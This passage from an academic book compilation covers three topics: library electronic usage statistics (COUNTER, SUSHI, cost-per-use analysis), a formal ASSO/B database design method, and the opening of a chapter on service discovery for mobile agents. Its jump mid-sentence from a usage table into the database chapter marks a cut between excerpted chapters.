to electronic format, more and more electronic statistics will be available, requiring more staff time to process the data. At the same time standards for electronic statistics were being developed, a parallel movement was occurring around electronic resource management elements. ERMI (the Digital Library Federation’s Electronic Resource Management Initiative) began defining the elements necessary for an effective electronic resource management system. ERMI evolved into ERMI2 which included requirements for usage data intake and reporting. COUNTER had defined the statistical elements and reporting format; ERMI2 began looking at protocols to move that data into an ERM. While the data itself was now standardized, the way of moving it around was not. In the summer of 2005 a small group met to start addressing this problem. The group included three librarians (Ivy Anderson, California Digital Library; Adam Chandler, Cornell University Library; and Tim Jewell, University of Washington Libraries) and representatives from four companies (Ted Fons, Innovative Interfaces, Inc.; Bill Hoffman, Swets Information Services; Ted Koppel, Ex Libris; and Oliver Pesch, EBSCO Information Systems) (Chandler & Jewell, 2006). Their efforts evolved into SUSHI (Standardized Usage Statistics Harvesting Initiative), soon operating under the wing of NISO. The initial group expanded to include additional publishers and automation system vendors. SUSHI began developing a protocol to allow automated harvesting of statistics from a variety of publishers, based on COUNTER standardization and using an XML envelope. The basic concept of SUSHI is simple. An ERM system should be able to automatically request, receive, and integrate statistics provided by a site, without human intervention. XML was selected as the best, most flexible wrapper for this interchange. The ERM should be able to generate a request, identifying the institution requesting the data, specifying the date range needed, and the
address to send the data. The ERM formulates the request, puts all the needed information into an XML file, and sends the file off to the site providing the statistics. The site should be able to receive this information, pull the requested COUNTER compliant data, pop it into an XML file and send it back to the originating ERM. If there is a problem, an error message should be sent. The ERM should then be able unwrap the report and load it into its databank. Finally, the ERM should be able to generate appropriate reports, although this final step is outside the SUSHI protocol, which only deals with the transfer of information to and from the ERM and the publisher. Currently SUSHI 1.0 protocol allows for the retrieval of any COUNTER report, including previous COUNTER releases. The XML schema developed was designed to be easily expanded to include additional COUNTER reports as they are developed. In 2006 NISO and COUNTER came to a formal agreement, in a memorandum of understanding outlining which organization would take care of what. NISO, through SUSHI, will maintain the XML schema. COUNTER will maintain the COUNTER standards and will list SUSHI compliant publishers and vendors on its Website (SUSHI, 2006). NISO currently offers toolkits on its Website for publishers interested in participating in SUSHI. Vendors are just beginning to move toward offering statistical harvesting features in their ERMs. A handful of vendors currently have released this feature, but the wave of the future is automated harvesting, as publishers offer both standardized reports and report transmission formats.
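The request/response cycle just described can be sketched in a few lines. The fragment below is purely illustrative: the XML element names are placeholders invented for exposition (they are not the actual NISO SUSHI schema), the service URL is hypothetical, and JR1 is used simply as an example of a COUNTER report identifier.

```python
# Illustrative sketch of an automated harvesting exchange between an ERM and a
# statistics provider. Element names are placeholders, NOT the NISO SUSHI schema.
import urllib.request
import xml.etree.ElementTree as ET

def build_request(requestor_id, customer_id, report, begin, end):
    root = ET.Element("UsageRequest")              # placeholder element names
    ET.SubElement(root, "Requestor").text = requestor_id
    ET.SubElement(root, "Customer").text = customer_id
    ET.SubElement(root, "Report", Name=report)
    period = ET.SubElement(root, "Period")
    ET.SubElement(period, "Begin").text = begin
    ET.SubElement(period, "End").text = end
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)

def harvest(service_url, payload):
    # The ERM sends the XML envelope; the provider returns either the requested
    # COUNTER report or an error message, also wrapped in XML.
    req = urllib.request.Request(service_url, data=payload,
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req) as resp:
        return ET.fromstring(resp.read())

if __name__ == "__main__":
    payload = build_request("my-erm", "library-001", "JR1",
                            "2006-01-01", "2006-12-31")
    # report = harvest("https://stats.example-publisher.com/usage", payload)
```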
MANAGEMENT OF ELECTRONIC STATISTICS There are some issues that need to be addressed for an institution to effectively manage the collection and analysis of user statistics. First, you
must identify which products you want to track. Since electronic use is becoming a major component of most “gate counts,” you want to collect as many as practical, particularly with the growing inclusion of these statistics in national annual surveys. But, do you track each direct journal you subscribe to outside of your packages? Such tracking entails significant staff time. If you are looking at a major cancellation project, can you afford not to have them? Do you only collect statistics that are COUNTER compliant? This leaves you with a great deal of uncounted use. How do you count those products that provide statistics that are not COUNTER compliant, yet are evidence of significant use? Second, staff must be assigned the task of collecting them. This requires training staff on how to get to the statistics and identifying what particular type of statistic to collect. COUNTER compliant sites are generally easier to navigate, but the exact location of the statistics you want to gather can reside several pages into a publisher’s statistical interface, and may move around as publishers revise their Web pages. For nonCOUNTER sites, screen shots of selected data elements may be needed to ensure consistency of just what data is to be recorded. While the amount of time spent gathering statistics decreases as publishers move to providing them in COUNTER format, the overall time increases as more and more publishers provide them. Eventually, when all publishers provide statistics in both COUNTER and SUSHI compliant form, and all institutions have electronic resource management systems that can automatically harvest them, that effort will become much less onerous, but this future will not be quickly seen. Even COUNTER compliant statistics profit from having an alert eye looking at them. One red flag is a sudden, very high peak in usage, which may be the result of automatic downloading software, usually constituting illegal use as spelled out in the product license. Publishers fairly frequently notify subscribers when there
has been a problem with a certain segment of their user statistics and that they may be recalculated. When a publisher becomes COUNTER compliant, they often continue to provide the old format of statistics. Staff needs to monitor statistics and adjust to format changes. If a publisher includes statistics for titles not subscribed to by the institution, you may want those weeded out. Once statistics are gathered, they need to be compiled in a meaningful way. Most institutions use spreadsheets at this point. The challenge is creating a spreadsheet that allows you to meaningfully present quite a range of statistics types, both COUNTER and nonCOUNTER. The author’s institution currently uses a spreadsheet that divides statistics into searches, serial downloads, e-book downloads, other full-text, and other. Each product must be assigned a category and tracked. As the number of electronic products mount, this can be challenging. The annual ACRL statistical survey now asks for number of sessions, searches, and full-text article downloads, as defined by COUNTER. Since not all publishers provide COUNTER compliant statistics, you may want to indicate on your spreadsheet which ones are compliant. Another decision to be made is how long you want to preserve these statistics. Ideally, you want to use them to look at use of both a particular product and overall use over time. How do you insure that the statistics from five years ago will be there when you want to do that analysis? Even with ERMs warehousing statistics, there are likely to be limitations on the number of years of storage.
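The compilation step described above can be sketched as a small script. Everything in it is invented for illustration: the product names, category assignments, and counts are hypothetical, and the script simply shows the kind of grouping a spreadsheet (or an ERM) performs.

```python
# Sketch of compiling harvested monthly usage rows into the categories tracked
# by the author's institution. Products and counts below are hypothetical.
from collections import defaultdict

CATEGORIES = ("searches", "serial downloads", "e-book downloads",
              "other full-text", "other")

# Each product is assigned one category and flagged as COUNTER compliant or not.
PRODUCTS = {
    "Publisher A journals": ("serial downloads", True),
    "Aggregator B index":   ("searches", True),
    "E-book platform C":    ("e-book downloads", False),
}

def compile_totals(rows):
    """rows: iterable of (product, month, count) tuples harvested from vendors."""
    totals = defaultdict(int)
    non_compliant = set()
    for product, month, count in rows:
        category, compliant = PRODUCTS[product]
        totals[category] += count
        if not compliant:
            non_compliant.add(product)
    return dict(totals), non_compliant

rows = [("Publisher A journals", "2006-01", 412),
        ("Aggregator B index", "2006-01", 958),
        ("E-book platform C", "2006-01", 77)]
print(compile_totals(rows))
```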
USE OF ELECTRONIC STATISTICS At this point user statistics are reasonably reliable and meaningful, at least compared to even two years ago. What we do with these statistics, what information they tell us and how we put them to work to improve different functions of the library is the next question. As Mercer (2000) states, “Im-
portant decisions about the nature of our individual libraries are made based on performance factors that often support what we intuitively believe to be true” (¶ 2). The metrics of electronic use may supplant, or will at least supplement, traditional library statistics such as door counts and circulation figures. It is obvious that physical visits to libraries are dropping dramatically as use of electronic materials increases. Proof that users, regardless of their method of access, are using library materials and using them heavily, will be important information for those who decide the fate of library budgets. Subscriptions have a natural life cycle and statistics are helpful in each stage. It is not immediately obvious how statistics can be useful in the selection of a product. Since you do not have the product, you obviously do not have usage statistics. Hahn and Faulkner (2002), of the University of Maryland Libraries, have developed a method of using usage statistics, if the package or journal being considered has similarities to a subscription already held by the institution. First they evaluate an existing collection, developing three metrics: average cost per article, average cost per use, and content-adjusted use. They feel the quantity of articles published in a year, and the use of those articles, are helpful in evaluation. As shown in Table 2, they have a licensed collection with a known price, number of published articles, and number of downloads of those articles. From this they calculate the average cost per article (price divided by total number of articles), average cost per access (price divided by number of downloads), and content-adjusted use (number of accesses divided by number of articles.) Average cost per article can also be calculated for the candidate collection. In this instance, the candidate collection has a higher cost per article—a higher total cost and lower number of articles published. The authors recognize this is not sufficient information for evaluating a collection and have developed three additional benchmarks: cost-
Table 2. Comparison of candidate collection to licensed collection

Price: Licensed Collection $10,000; Candidate Collection $25,000
Total number of online articles as of the end of the year: Licensed Collection 50,000; Candidate Collection 45,000
Total annual number of full-text accesses to the articles in the collection: Licensed Collection 25,000; Candidate Collection Unknown
Average cost per article (cost/# articles): Licensed Collection $.20; Candidate Collection $.55
Content-adjusted use (accesses/# articles): Licensed Collection 0.50; Candidate Collection Unknown
Average cost per access (price/accesses): Licensed Collection $.40; Candidate Collection Unknown
Table 3. Use of benchmarks to compare candidate collection and licensed collection

Price: Licensed Collection $10,000; Candidate Collection $25,000
Total number of online articles as of the end of the year: Licensed Collection 50,000; Candidate Collection 45,000
Total annual number of full-text accesses to the articles in the collection: Licensed Collection 25,000; Candidate Collection Unknown; Benchmark: 62,500 uses needed to match average cost per access (cost-based usage)
Average cost per article (cost/# articles): Licensed Collection $.20; Candidate Collection $.55
Content-adjusted use (accesses/# articles): Licensed Collection 0.50; Candidate Collection Unknown; Benchmark: 22,500 uses needed to match content-adjusted use (content-based usage)
Average cost per access (price/accesses): Licensed Collection $.40; Candidate Collection Unknown; Benchmark: $1.11, cost if content-adjusted use met (cost per access at content-based usage level)
based usage, content-based usage, and cost per access at the content-based usage (Table 3). The cost-based usage determines the number of yearly accesses, or downloads, the candidate collection will need in order to meet the same average cost per access as the licensed collection. This is calculated as the price of the candidate collection divided by the cost per access of the licensed collection, in this case $25,000 divided by $.40 = 62,500 accesses. Content-based usage is the number of articles in the candidate collection multiplied by the content-adjusted usage of the licensed collection. This gives the number of full-text accesses needed to match the content-adjusted use (number of accesses divided by number of articles). In this case it is 45,000 multiplied by 0.50 = 22,500 uses. The final benchmark is cost per access at the content-based usage level. This calculates the cost per access if the content-based usage is achieved. This is calculated using the candidate collection price divided by the content-based usage benchmark; $25,000 divided by 22,500 = $1.11. Obviously other factors need to be included into the evaluation of a potential product. But this method allows an estimation of the quantity of use required for a product to match a similar product in cost effectiveness.
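The calculations behind Tables 2 and 3 can be reproduced in a few lines. The sketch below simply re-implements the arithmetic described above for the example collections; it is an illustration of the method, not code from Hahn and Faulkner.

```python
# The three metrics and three benchmarks described above, applied to the
# licensed/candidate collections of Tables 2 and 3.
def collection_metrics(price, articles, accesses):
    return {"cost_per_article": price / articles,
            "content_adjusted_use": accesses / articles,
            "cost_per_access": price / accesses}

def candidate_benchmarks(cand_price, cand_articles, licensed):
    m = collection_metrics(**licensed)
    cost_based_usage = cand_price / m["cost_per_access"]          # accesses needed
    content_based_usage = cand_articles * m["content_adjusted_use"]
    return {"cost_based_usage": cost_based_usage,
            "content_based_usage": content_based_usage,
            "cost_per_access_at_content_based_usage": cand_price / content_based_usage}

licensed = {"price": 10_000, "articles": 50_000, "accesses": 25_000}
print(collection_metrics(**licensed))
# cost_per_article 0.20, content_adjusted_use 0.50, cost_per_access 0.40
print(candidate_benchmarks(25_000, 45_000, licensed))
# cost_based_usage 62,500; content_based_usage 22,500; cost per access $1.11
```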
Another use for statistics when evaluating a potential purchase occurs when archives are being considered, particularly when used with other information such as that provided by Tenopir and King (2000, p.188). They analyzed the pattern of use of a journal broken down by article age. Scientists made up the demographic group they were studying and it is likely that discipline of the user would affect these patterns. However, a later examination of three studies on journal usage (King, Tenopir, Montgomery, & Aerni, 2003), which included nonscientific faculty, provided results that roughly approximated their original finding (Table 4). About 58.5% of the use of a journal involves articles that have been published within the last year.

Table 4. Age and use of articles
Age of article      Percent of use
1                   58.5
2                   12.3
3                    6.2
4-5                  7.7
6-10                 9.3
11-15                1.5
>15                  4.6

If a library already subscribes to a journal, their data could be used to project usage of archives, particularly for a scientific or technical field. For example, let us look at Journal A. A subscription to Journal A includes the current 2 years, costs $2000.00, and generated 250 downloads within the last year. This represents a cost per article of $8.00 ($2000 divided by 250). These downloads represent about 70.8% of the total expected use of the publication (58.5% the first year and 12.3% the second year). If all years were available the projected use would be 353 downloads (250 divided by .708). The archives are priced at an annual fee of an additional $150.00. Use can be predicted to be 29.2% of the projected total use, for an estimated archival use of 103 articles per year. The cost per article is then calculated at $150.00 divided by 103, for a cost of $1.46 per article. In another example, Publisher A offers an archival package that includes four journals, with coverage up to 1998. The institution's current subscription to those journals generated 1326 downloads in one year, covering a publication period of 8 years, and representing 90.3% of expected use, using Tenopir and King's chart, with a little extrapolation for the 6-10 year span. If all years were available, you can predict a total use of 1468 (1326 divided by .903). The cost of the current subscriptions is $8,752 (combined cost of
the four journals) divided by 1326 uses results in a cost of $6.60 per article download. The archival package has an initial cost of $8,000 with an annual maintenance fee of $350. The projected annual use is 142 articles (1468 downloads times 9.7%). Using the average cost of $6.60 from the current subscription, it would take about 9 years before the initial cost is recovered (142 times $6.60 for an annual cost of $937.20, $8000 divided by the annual cost). But a comparison of document delivery costs should also be made. Assuming $30.00 per document requested, a ball-park document delivery charge, 142 documents requested a year would generate a total annual cost of $4,260. This makes that initial cost of $8000.00 begin to look much more cost effective. Obviously, usage statistics can play a prominent role in the evaluation of an existing library’s subscription. The literature frequently warns of relying too heavily on statistics, but truthfully, reliable statistics are taking some of the guess-work out of evaluation. Clearly, they are not the only criteria, factors such as the size of the program a journal supports, a journal’s importance to its field, publishing patterns by the institution’s faculty, membership on editorial boards by faculty, and so on, all need to be considered, but for the first time, we have some real data to frame decisions. An emerging evaluation standard is the cost per article download. It is a relative figure and only has meaning in comparison to other cost per article calculations from the institution or in comparison to document delivery costs. Within that context, it is a very helpful metric. Kraemer reports creating an annual evaluation overview which includes a complete list of usage and cost per usage, a list of both high and low cost per use products, and a list of high demand titles generated from interlibrary loan requests (Bordeaux, Karmer, & Sullenger, 2005). Such analyses set a useful framework in which to place renewal decisions. Cost per use is also helpful when evaluating a package subscription. A question that is often
raised is whether it is better use of your money to subscribe to a package deal or to pick off the high use titles and subscribe to them individually. A straightforward examination of this question can be made. The cost per use of the package is easily calculated. In the example represented in Table 5, the package deal comes with a requirement to maintain existing subscriptions to titles carried by the publisher. The total cost of the package is thus the package cost and the associated subscription costs. This figure, divided by the total usage, gives you the cost per use of the package. Looking at your individual title usage, arranged from high use to low, you could then calculate the point at which the total of individual title subscriptions would equal your package total. In this case, the cost of twenty journals with the highest use roughly matches the total package costs. These journals account for only 44.5% of the overall usage. Since use is not highly concentrated with a few journals, it clearly is more cost effective to subscribe to the whole package. With other packages, where use is concentrated in fewer journals, it may turn out that picking off the high use journals is more cost effective. In either case your usage figures allow a methodical decision. Occasionally, because of financial set backs, an institution may be required to conduct a cancellation project. Here too, user statistics can be of great assistance. In the following scenario, shown in Table 6, an institution has a projected electronic expenditure of $406,483. Unfortunately, the available allocation is $203,000. How can those funds be spent to maximize the return? There are several criteria that could be useful, such as total number of journals subscribed to, total number of article downloads, availability of articles through alternative sources such as document delivery, subject coverage of retained journals, and feedback from faculty. Taking a methodical look at usage is helpful. Cost is projected for the next year as increasing 8%. In our example, direct subscriptions represent
Table 5. Analysis of individual journal performance within a publisher's package (individual titles Jrnl A through Jrnl Z with their per-title usage)

Publisher A: Total # of journals 844; Total article downloads in year 5,848; Package cost $8,765; Required subscription cost $24,367; Total cost $33,132; Cost/use $5.67
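The package-versus-individual-titles comparison described above can likewise be scripted. In the sketch below, only the package totals come from Table 5; the per-journal prices and download counts are hypothetical placeholders.

```python
# Sketch of the package vs. individual-title comparison described above.
def package_cost_per_use(package_fee, required_subs, downloads):
    return (package_fee + required_subs) / downloads

def break_even_titles(journals, package_total):
    """journals: list of (title, annual_price, downloads), any order.
    Returns how many of the highest-use titles fit within the package budget
    and the share of total use those titles account for."""
    journals = sorted(journals, key=lambda j: j[2], reverse=True)
    total_use = sum(d for _, _, d in journals)
    spent = covered = kept = 0
    for title, price, downloads in journals:
        if spent + price > package_total:
            break
        spent += price
        covered += downloads
        kept += 1
    return kept, covered / total_use

print(package_cost_per_use(8_765, 24_367, 5_848))   # about $5.67 per download
titles = [("Jrnl A", 1_900, 410), ("Jrnl B", 1_650, 365), ("Jrnl C", 1_400, 290)]
print(break_even_titles(titles, 33_132))
```

If the titles that fit within the package budget account for only a modest share of total use, as in the chapter's example, the package is the more cost-effective choice; if use is concentrated in a few journals, individual subscriptions may win.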
Table 6. Various characteristics of current subscriptions (Electronic Product allocation: $203,000)

Columns: Package; Available Ingenta?; Available ECO?; # Jrnls; % total Jrnl titles; Article Downloads 2005; % Total downloads; FY06 Cost; Cost/Use 2006; Projected cost (8% increase)
of object database systems can be explained by observing that in semantic data models each object instance can belong to any class of a specialization hierarchy, thus enhancing flexibility, whereas in object data models each object instance belongs to one and only one class, thus limiting flexibility while enhancing efficiency. Semantic data models have always been translated into relational models; an approach proposed in literature to map semantic data models into object models is the Partitioning Method (Locuratolo & Rabitti, 1998). This section gives a procedure for mapping a directed acyclic graph of classes supported by semantic data models, in the following called conceptual classes, into classes supported by object models, in the following called logical classes. Let us suppose that no direct descendant of the root has further descendants. We discuss an approach to designing the graph of logical classes GL starting from a graph of conceptual classes GC. Let us distinguish the following two cases: a1 and a2.

Case a1 is the elementary situation of a root with a single direct descendant:

GC = <son> is-a <root>  ⇔  GL = <son> is-aL <root - son>

The two nodes <son> and <root - son> define a partition of the original root, whereas is-aL is the logical specialization, or an oriented link from the node <son> to the node <root - son>. Each object belongs to one and only one logical class. The logical inclusion property is indirect, that is, it holds in terms of attribute inheritance. Case a2, in which the root has several direct descendants,

GC = {<son1> is-a <root>, ..., <sonp> is-a <root>}

can be solved by decomposing the problem into two independent problems of the same type and by merging the respective solutions. The simplest situation illustrating the case a2 is composed by a root and two direct descendants of the root. The graph GC is then decomposed as follows:

GC1 = {<son2> is-a <root - son1>}
GC2 = {<son2> is-a <root ∩ son1>}

These two conceptual graphs belong to the previously solved elementary case and thus can be transformed into the corresponding logical graphs:

GL1 = {<son2> is-aL <(root - son1) - son2>}
GL2 = {<son2> is-aL <(root ∩ son1) - son2>}

The logical graphs GL1 and GL2 are then merged by linking their respective roots through the is-aL relationship. The described procedure is based on the classic Divide and Conquer technique. This technique has been adapted in order to be applied to a graph of conceptual classes as follows:

1. Direct solution of the problem when applied to the elementary case.
2. Decomposition of the problem into two independent sub-problems of the same type. The graph GC is decomposed into two graphs whose root defines a partition of the GC root. The partition is obtained by set difference and set intersection between the GC root and the leftmost son.
3. Recursive solution of each a2 sub-problem.
4. Composition of the two sub-problem solutions in order to obtain the global solution.
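A small example may help make the divide-and-conquer procedure concrete. The Python sketch below treats classes simply as sets of object identifiers and tags each resulting logical class with the conceptual classes its objects belong to; the example populations are invented, and this is only an informal illustration of the idea, not the formal ASSO/B development.

```python
# Sketch of the divide-and-conquer partitioning described above. Classes are
# modelled as sets of object identifiers; the result is a list of disjoint
# logical classes, each tagged with the conceptual classes it specializes.
def partition(root, sons, path=("root",)):
    """root: set of objects; sons: list of (name, subset-of-root) pairs."""
    if not sons:
        # Elementary case: a single logical class holding these objects.
        return [(path, root)] if root else []
    name, s1 = sons[0]
    rest = sons[1:]
    outside = root - s1                     # root - son1
    inside = root & s1                      # root ∩ son1
    classes = []
    # Objects outside the leftmost son: recurse with the remaining sons.
    classes += partition(outside, [(n, s & outside) for n, s in rest], path)
    # Objects inside the leftmost son: recurse likewise, extending the tag.
    classes += partition(inside, [(n, s & inside) for n, s in rest], path + (name,))
    # Merging the two sub-solutions corresponds to linking their roots via is-aL.
    return classes

root = {1, 2, 3, 4, 5, 6}
sons = [("employee", {1, 2, 3}), ("student", {2, 4})]
for tag, objs in partition(root, sons):
    print(tag, sorted(objs))
# ('root',) [5, 6]                        plain root objects
# ('root', 'student') [4]                 student only
# ('root', 'employee') [1, 3]             employee only
# ('root', 'employee', 'student') [2]     both employee and student
```

Each object ends up in exactly one logical class, which is precisely the property that distinguishes the logical graph from the conceptual one.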
Attributes and transactions are associated with the nodes of the graphs as in Locuratolo and Matthews (1999a, 1999b, 1999c).
CONCLUSION AND FURTHER DEVELOPMENTS The use of formal methods in the design of database applications can lead to several advantages, including the possibility of guaranteeing the specification consistency and the design correctness. However, formal methods can be too difficult and expensive if compared with existing informal methods. Specifying a database application with the abstract machine notation is a tedious process, since many properties implicitly declared with the database conceptual languages must be explicated. Further, the direct use of B makes the consistency proofs too expensive, since these must be performed not only with respect to the explicit constraints, but also with respect to the class and the specialization constraints. This chapter is devoted to the integration of the ASSO abstraction mechanisms in B. The Abstract Machine state has been restricted with respect to B, since only the state transformations which satisfy the class and the specialization constraints are allowed. If the model for ASSO is directly constructed in B:
More detail is added to the Abstract Machines than is necessary in the form of implicit constraints; More proof obligations are generated and proved than is necessary, to show that transactions respect the implicit constraints; and More Abstract Machines are designed than is necessary.
According to the described proposal, only those Class-Machine and Specialized Class-Machines are designed which are necessary to prove the model consistency. By designing only those machines, we have raised the abstraction level of B by imposing the implicit assumptions of ASSO, and we have thus produced a more efficient way of generating designs in the database field, while adding the quality of higher design. Consistency and behavioral refinements of Structured Database Schema specifications can be proved exploiting tools for B (B-Core); the partitioning tool could be designed exploiting the features of the proposed algorithm with the associated properties. The emphasis of this chapter is on database application modeling and correct model transformations. This approach can have various practical implications: •
To minimize the number of proof obligations and the costs to guarantee the Structured Database Schema consistency. To interpret the specialization hierarchies of the Structured Database Schemas as an approach to eliminate redundancy of not necessarily executable code. To acquire knowledge for specializing general purpose methods employed at industrial level for specific application areas.
ACKNOWLEDGMENT The author would like to thank her husband, Antonio Canonico, and her children, Paola and Floriano, for their help and advice. Figure 3 has been reprinted from “ASSO: Behavioral Specialization Modelling” by Rosanna Andolina and Elvira Locuratolo in Information Modelling and Knowledge Bases VIII, edited by H. Kangassalo, J. Nilson, H. Jaakkola and S. Ohsuga, pages 241-259, copyright 1997, with kind permission from IOS Press.
REFERENCES Abiteboul, S., & Hull, R., & Vianu, V. (1995). Foundations of databases. Addison-Wesley. Abrial, J. R. (1989). A formal approach to large software construction. Lecture Notes in Computer Science, Vol. 375. Abrial, J. R. (1996). The B-book: Assigning programs to meanings. Cambridge University Press. Andolina, R., & Locuratolo, E. (1997). ASSO: Behavioural Specialisation Modelling. In H. Kangassalo (Ed.), Information modelling and knowledge bases VIII (pp. 241-259). IOS Press. Batini, C., Ceri, S., & Navathe, S. B. (1992). Conceptual database design: An entity-relationship approach. Redwood City, CA: Benjamin Cummings. B-Core. B-toolkit (Online Manual). Oxford, UK. Retrieved from http:// www.b-core.com Booch, G. (1994). Object-oriented analysis and design with applications. Redwood City, CA: Beniamin Cummings. Cardenas, A. F., & McLeod. (1990). Research foundations in object-oriented and semantic database systems. Englewood Cliffs, NJ: Prentice Hall. Castelli, D., & Locuratolo, E. (1994). A formal notation for database conceptual schema specifications. In H. Jaakkola, H. Kangassalo, T. Kitahashi, & A. Markus (Eds.), Information modelling and knowledge bases V. IOS Press. Castelli, D., & Locuratolo, E. (1995). ASSO: A formal database design methodology. In H. Kangassalo, H. Jaakkola, S. Ohsuga, & B. Wangler (Eds.), Information modelling and knowledge bases VI. IOS Press.
Facon, P., Laleau, R., & Nguyen, H. P. (1996). Mapping object diagrams into B specifications. In A. Bryant, & L. T. Semmens (Eds.), Proceedings of the Methods Integration Workshop. Electronics Workshops in Computing, BCS. Locuratolo, E. (1997, August 12-13). ASSO: Evolution of a formal database design methodology. In Proceedings of Symposium on Software Technology (SoST‘97), Buenos Aires. Locuratolo, E., & Rabitti, F. (1998). Conceptual classes and system classes in object databases. Acta Informatica, 35(3), 181-210. Locuratolo, E., & Matthews, B. M. (1999a). On the relationship between ASSO and B. In H. Jaakkola, H. Kangassalo, & E. Kawaguchi (Eds.), Information modelling and knowledge bases X (235-253). IOS Press. Locuratolo, E., & Matthews, B. M. (1999b). ASSO: A formal methodology of conceptual database design. In S. Gnesi & D. Latella (Eds.), Proceedings of the Federated Logic Conference, 4th International ERCIM Workshop on Formal Methods for Industrial Critical Systems (pp. 205-224). Locuratolo, E., & Matthews, B. M. (1999c). Formal development of databases in ASSO and B. In J. Wing, Woodcock, & J. Davies (Eds.), Lecture Notes in Computer Science, Vol. 1708, FM 99 — Formal methods (pp. 388-410). BerlinHeidelberg: Springer-Verlag. Locuratolo, E. (2001). MetaASSO: An approach for quality. IEI, TR 41. Locuratolo, E. (2002). Designing methods for quality. In H. Kangassalo, H. Jaakkola, E. Kawaguchi, & T. Welzer (Eds.) Information modelling and knowledge bases XIII (pp. 279-295). IOS Press. Locuratolo, E. (2004). Model transformations in designing the ASSO methodology. In P. van Bommel (Ed.), Transformation of knowledge,
information and data: Theory and applications (pp. 283-302). Hershey, PA: Information Science Publishing. Mammar, A., & Laleau, R. (2003). Design of an automatic prover dedicated to the refinement of database applications. In K. Araki, S. Gnesi, & D. Mandrioli (Eds.), CEDRIC-IIE (CNAM), Lecture Notes in Computer Science, Vol. 2805, FME 2003: Formal Methods (pp. 835-853), Evry, France.
Nixon, B., & Mylopoulos, J. (1990). Integration issues in implementing semantic data models. Advances in database programming languages (pp. 187-217). ACM Press. Rumbaugh, J., & Booch, G., & Jacobson, I. (1999). The unified modelling language reference manual. Reading, MA: Addison-Wesley. Shore, R. (1996). An object-oriented approach to B. In H. Habrias (Ed.), Proceedings of the 1st Conference on the B-Method, Nantes, France.
This work was previously published in Database Modeling for Industrial Data Management: Emerging Technologies and Applications, edited by Z. Ma, pp. 35-61, copyright 2006 by Information Science Publishing (an imprint of IGI Global).
Chapter 2.3
A Database Service Discovery Model for Mobile Agents Lei Song University of Guelph, Guelph, Canada Xining Li University of Guelph, Guelph, Canada Jingbo Ni University of Guelph, Guelph, Canada
ABSTRACT One of the main challenges of mobile agent technology is how to locate hosts that provide services requested by mobile agents. Traditional service location protocols can be applied to mobile agent systems in order to explore the service discovery issue. However, because of their architecture deficiencies, they adequately do not solve all the problems that arise in a dynamic domain such as database location discovery. From this point of view, we need some enhanced service discovery techniques for the mobile agent community. This article proposes a new model for solving the database service location problem in the domain of mobile agents by implementing a service discovery module based on search engine techniques. As a typical interface provided by a
mobile agent server, the service discovery module improves the decision ability of mobile agents with respect to information retrieval. This research is part of the IMAGO system, an infrastructure for mobile agent applications. This article focuses on the design of an independent search engine, IMAGOSearch, and discusses how to integrate service discovery into the IMAGO system, thus providing a global scope service location tool for intelligent mobile agents.
INTRODUCTION The number of services that will become available in distributed networks (in particular, on the Internet) is expected to grow enormously. Besides classical services such as those offered
by printers, scanners, fax machines, and so on, more and more services will be available nowadays. Examples are information access via the Internet, music on demand, Web services, and services that use computational infrastructure that has been deployed within the network. Moreover, the concept of service in mobile agent systems, which will be described in this article, has come into prominence recently. The mobile agent model is a new distributed software development paradigm as compared to the traditional client-server model. Instead of calling operations on servers with some form of synchronization, the user passes on his or her goal to an agent that can migrate within the computational environment and knows how to handle it without being controlled. In brief, mobile agents are active, autonomous, intelligent objects that are able to move between locations in a so-called agent system. Mobile agents must interact with their hosts in order to use their services or to negotiate services with other agents (Song & Li, 2004). Discovering services for mobile agents comes from two considerations. First, the agents possess local knowledge of the network and have a limited functionality, since only agents of limited size and complexity can migrate efficiently in a network and have little overhead. Hence, specific services are required that aim at deploying mobile agents efficiently in the system and the network. Second, mobile agents are subject to strong security restrictions, which are enforced by the security manager. Thus, mobile agents should find services that help to complete security-critical tasks other than execute code that might jeopardize remote servers. Following this trend, it becomes increasingly important to give agents the ability to find and make use of services that are available in a network (Bettstetter & Renner, 2000). Some of the mobile agent systems developed in the last few years are Aglets (Lange & Ishima, 1998), Voyager (Recursion Software Inc, 2005), Grasshopper (Baumer et al., 1999), Concordia (Mitsubishi Electric, 1998), and D’Agents (Gray
et al., 2000). Research in the area of mobile agents looked at languages that are suitable for mobile agent programming, and languages for agent communication. Much effort was put into security issues, control issues, and design issues. Some state-of-the-art mobile agent systems focus on different aspects of the above issues (e.g., Aglets on security, D’Agents on multi-language support, Grosshopper on the implementation of the FIPA [FIPA, 2002], and MASIF [Milojicic et al., 1998] standard). However, few research groups have paid attention to offering an environment to combine the concept of service discovery and mobile agent paradigm. Most existing mobile agent systems require their programmers to specify agent migration itinerary explicitly. This makes mobile agents weak in their ability to sense their execution environment and to react autonomously to dynamic distributed systems. In this article, we propose a new service discovery model DSSEM (discovery service via search engine model) for mobile agents. DSSEM is based on a search engine, a global Web search tool with centralized index and fuzzy retrieval. This model especially aims at solving the database service location problem and is integrated with our IMAGO (intelligent mobile agent gliding online) system. The IMAGO system is an infrastructure for mobile agent applications. It includes code for the IMAGO server—a multi-threading logic virtual machine, the IMAGO-Prolog—a Prologlike programming language extended with a rich API for implementing mobile agent applications, and the IMAGO IDE, a Java-GUI-based program from which users can perform editing, compiling, and invoking an agent application. In our system, mobile agents are used to support applications, and service agents are used to wrap database services. Service providers manually register their services in a service discovery server. A mobile agent locates a specific service by submitting requests to the service discovery server with the description of required services. Web pages are used to advertise services. The design goal of DSSEM is
to provide a flexible and efficient service discovery protocol in a mobile agent environment. The rest of the article is organized as follows. The next section presents a brief background related to this article and discusses the problem of service discovery in mobile agent systems. The section Discovery Services Via Search Engine Model (DSSEM) introduces DSSEM and compares it with several service discovery protocols (SDPs) currently under development. The comparison criteria include functionality, dependency on operating systems, and platforms. The section titled Service Discovery in the IMAGO System gives an overview of the design of the service discovery module and its integration with the IMAGO system. Finally, the last section provides some discussion and concluding remarks as well as future work.
